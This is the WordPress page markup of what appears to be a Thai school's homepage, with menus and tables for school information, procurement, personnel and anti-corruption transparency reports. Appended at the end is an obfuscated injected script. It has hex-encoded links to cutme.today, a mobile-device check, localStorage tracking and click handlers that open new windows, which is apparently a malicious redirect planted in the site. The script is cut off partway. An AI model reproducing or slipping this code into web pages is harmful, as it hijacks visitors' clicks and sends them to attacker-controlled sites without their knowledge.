-->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 